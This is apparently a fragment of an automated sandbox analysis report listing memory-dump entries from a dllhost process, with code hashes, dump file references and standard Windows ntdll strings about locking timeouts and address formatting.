                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bd2411bebb589657ee67d95d34eeff76ca6cbcd1fb62621e5c2a447d13caaac5
                                                                                                      • Instruction ID: ec328002694e276d4bc94b944c184a6b39e5d5e9b8c44ad4668ec0ec4e1f9650
                                                                                                      • Opcode Fuzzy Hash: bd2411bebb589657ee67d95d34eeff76ca6cbcd1fb62621e5c2a447d13caaac5
                                                                                                      • Instruction Fuzzy Hash: 1F90022170140906D102B1984404616040A87D0241FA5C063B6028555ECB258A96A532
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c4fa2f5c78d0fac3c20206cf51ebf8f37672ed0483d8cefdaeade68ba5b347ff
                                                                                                      • Instruction ID: 1ea41ae18491fb1f2198797f3d7f5f07bcfdc2b3a31b99a7e3ff7c22f6222e60
                                                                                                      • Opcode Fuzzy Hash: c4fa2f5c78d0fac3c20206cf51ebf8f37672ed0483d8cefdaeade68ba5b347ff
                                                                                                      • Instruction Fuzzy Hash: D790027130140806D141B1984404746040587D0301F65C052BA068554E87598ED96A66
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b77fca018a465ef3b0c03bb1ce952d6fde963c2166af4de351b094ca22a4affb
                                                                                                      • Instruction ID: 3369308e9951967e30749190fabee72b908aaed32b4caa372003e7ca2a9b6907
                                                                                                      • Opcode Fuzzy Hash: b77fca018a465ef3b0c03bb1ce952d6fde963c2166af4de351b094ca22a4affb
                                                                                                      • Instruction Fuzzy Hash: 9890022130140806D103B19844146060409C7D1345FA5C053F6428555D87258A57A533
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e86c778ea4c67e2b56604e44b85609e43b668fe9673e5c7399346d996df01441
                                                                                                      • Instruction ID: 598c2b9dd2982e38964aa2d01cb3ea9caa5b8d977a52fb6e360c53d3f6ba21f9
                                                                                                      • Opcode Fuzzy Hash: e86c778ea4c67e2b56604e44b85609e43b668fe9673e5c7399346d996df01441
                                                                                                      • Instruction Fuzzy Hash: F690023134140806D142B1984404606040997D0241FA5C053B5428554E87558B5AAE62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fbf5a73a248437483939a71ad7769c262411b81413281eb857231f85536a6651
                                                                                                      • Instruction ID: ea0481d90656267fe8404ba99e1458813a9c649fdbeb636acefb1a913dcf54a2
                                                                                                      • Opcode Fuzzy Hash: fbf5a73a248437483939a71ad7769c262411b81413281eb857231f85536a6651
                                                                                                      • Instruction Fuzzy Hash: 8290022130544846D101B5985408A06040587D0205F65D052B6068595DC7358955A532
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ddd0fbc8ded0c478507036491509ff6be50cd08d65b11a9d6b603f7d2175d41a
                                                                                                      • Instruction ID: 8d6fe88fdebe6ed7fa9f950e6b5c55a55b5f847e6b5647c488f85eab2a3e5a73
                                                                                                      • Opcode Fuzzy Hash: ddd0fbc8ded0c478507036491509ff6be50cd08d65b11a9d6b603f7d2175d41a
                                                                                                      • Instruction Fuzzy Hash: CF900231302405469541B2985804A4E450587E1302BA5D456B5019554CCA1489655622
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3a12705ea4ebfaf89deb93cc04644fff7756fe159b538ac7a1cd9606e8bfd817
                                                                                                      • Instruction ID: 1419ce69a3ddc20da6b74f450f629a6b2432bae4d52f749470c91608e89366d5
                                                                                                      • Opcode Fuzzy Hash: 3a12705ea4ebfaf89deb93cc04644fff7756fe159b538ac7a1cd9606e8bfd817
                                                                                                      • Instruction Fuzzy Hash: F690023530140806D511B1985804646044687D0301F65D452B5428558D875489A5A522
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5bfb64efac8c227e47bbad581c876af41fd9e175f37e97e4f10183019abfdbd5
                                                                                                      • Instruction ID: 3b8925f21537c39c00098629f3d437e16c260af20ac995e6a6c544a543e14ee0
                                                                                                      • Opcode Fuzzy Hash: 5bfb64efac8c227e47bbad581c876af41fd9e175f37e97e4f10183019abfdbd5
                                                                                                      • Instruction Fuzzy Hash: 1490022170540806D141B1985418706041587D0201F65D052B5028554DC7598B596AA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 423a32c2f2b3c3ce6039325e6cbb70892fde560bc0c41e20a63d787267e4856f
                                                                                                      • Instruction ID: 04c9b8489d51aabab76ed91337aa8ab0951b12f5a866d0d9a8a2b513e8a463b4
                                                                                                      • Opcode Fuzzy Hash: 423a32c2f2b3c3ce6039325e6cbb70892fde560bc0c41e20a63d787267e4856f
                                                                                                      • Instruction Fuzzy Hash: 9A90023130140807D101B1985508707040587D0201F65D452B5428558DD75689556522
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction ID: b76cb1db8491da84c186435e70da4422bebe669ae6acbd53b9ead5b07505b2fd
                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 503b9cd6f440e92f523b2096cb195d2a299a0b83b26cab10be31bdb757d54a91
                                                                                                      • Instruction ID: 15d30fff43b6d28ebfdd6cfa9d16913856684a5a200ec3879dd7ff843e4c3127
                                                                                                      • Opcode Fuzzy Hash: 503b9cd6f440e92f523b2096cb195d2a299a0b83b26cab10be31bdb757d54a91
                                                                                                      • Instruction Fuzzy Hash: B651C8B6A0411EBFDB14DBDC889097EFBB9BB0824571486E9F4A5D7A41D334DE40CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: cbb97b43afcd3c3513944addedcf221688bed03bbf5369c96aba977f1bdcc9d9
                                                                                                      • Instruction ID: f3848d0eba8554db3053f97ecce0b2eb20e54c77f3c8069c7c61ef0a691e914c
                                                                                                      • Opcode Fuzzy Hash: cbb97b43afcd3c3513944addedcf221688bed03bbf5369c96aba977f1bdcc9d9
                                                                                                      • Instruction Fuzzy Hash: D151D4B5A00646AEDB34DEDCC8909BFB7FDAB44201B0488D9E5A6D7741E774EA40C760
                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03874725
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03874742
                                                                                                      • Execute=1, xrefs: 03874713
                                                                                                      • ExecuteOptions, xrefs: 038746A0
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03874655
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03874787
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038746FC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: 73a950f6ea1fceb0bb35af17c1fed6249d49dc31bd6b261019c22e271d13c115
                                                                                                      • Instruction ID: a52652be7d3a8f5964d49a1018a9bb655b4f8bac98b67abc5f21e1078094e5da
                                                                                                      • Opcode Fuzzy Hash: 73a950f6ea1fceb0bb35af17c1fed6249d49dc31bd6b261019c22e271d13c115
                                                                                                      • Instruction Fuzzy Hash: 5851F6B564031D6AEB10EBE9DC95FAE73A9EB09304F0400E9E505EB291E770DA45CB91
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction ID: 8df7cb8fe21a8c0fc9714fdb20242024d6dfb352273062b0561acfdedeed0a1b
                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                      • Instruction Fuzzy Hash: 1081AD70E0524D9BDF26CFE8C9917AEBBA6AF45360F1C41DAD8A1E7B90C634C840CB51
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 0387031E
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038702E7
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038702BD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 6bf5f332c6a8715514c2febd2555bc610aa015b140e45c3a711661a2c1b43e91
                                                                                                      • Instruction ID: a1d165341dd876086f0c454e6c1f78cc97af19d3b119589d863242abb16d88b3
                                                                                                      • Opcode Fuzzy Hash: 6bf5f332c6a8715514c2febd2555bc610aa015b140e45c3a711661a2c1b43e91
                                                                                                      • Instruction Fuzzy Hash: E2E1AC716087459FD725CFA8C884B2ABBF1BB84718F180A9DF6A5CB2D1D774D884CB42
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 03877BAC
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03877B7F
                                                                                                      • RTL: Resource at %p, xrefs: 03877B8E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: aee5e6ec31228e9114749b4eb9f57f5f0f7a7b7455dce1bd42e04526d3795c73
                                                                                                      • Instruction ID: 934921941f7bba07b2a763ae420816a13e03b05226b54e3d590ddff48bcf3d45
                                                                                                      • Opcode Fuzzy Hash: aee5e6ec31228e9114749b4eb9f57f5f0f7a7b7455dce1bd42e04526d3795c73
                                                                                                      • Instruction Fuzzy Hash: 604114753017069FCB25DEA8C840B6AB7E5EF89720F140A9DF95ADB780DB30E805CB91
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0387728C
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 038772C1
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03877294
                                                                                                      • RTL: Resource at %p, xrefs: 038772A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 45f97dfc8a251a0eae0b888c900ec8ab4e8d5f5427b1eedf39b0f2053d26a7a1
                                                                                                      • Instruction ID: 732728d7c8d5b0ab2574ce173777cb9c22b74ec0411681a92d1e3421b6792d75
                                                                                                      • Opcode Fuzzy Hash: 45f97dfc8a251a0eae0b888c900ec8ab4e8d5f5427b1eedf39b0f2053d26a7a1
                                                                                                      • Instruction Fuzzy Hash: F3411075700246ABC721DEA4CC41F6AB7A6FF85714F140A99F966EB340DB20E842C7D1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: e8b62a2555fc5cbd3f3457addf97a11812c3983929def8d1b74a5a30b600840d
                                                                                                      • Instruction ID: 2006179487b99d5f7b8cb1ff0ee07b0af070a5f8f45a0dbd14c76066f41d2dc5
                                                                                                      • Opcode Fuzzy Hash: e8b62a2555fc5cbd3f3457addf97a11812c3983929def8d1b74a5a30b600840d
                                                                                                      • Instruction Fuzzy Hash: 4C315476A006199FDB20DE69CC40BEEB7B8EB44650F444996E849E7240EB30AA459BB1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction ID: d4cfc35ea397d8f3e4bad50b4eda9ae3056afa84a4c275df4fc0f9a20372e92a
                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                      • Instruction Fuzzy Hash: E9918E70E0031E9BDF24DFE9C880ABEB7A5AF44720F58469AF875E7AC4E73499408751
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: fe45af1c51da70822105e71255c53541351e546e24f9545d69fca0c3610423e1
                                                                                                      • Instruction ID: cc095c8f0714d3d91283a0e6c9aeba3bfba1faa128aefd45099f4172b0c6110b
                                                                                                      • Opcode Fuzzy Hash: fe45af1c51da70822105e71255c53541351e546e24f9545d69fca0c3610423e1
                                                                                                      • Instruction Fuzzy Hash: E9814875D002699BDB31DB94CC44BEEB7B8AB08710F0445EAE909F7290E7349E84CFA1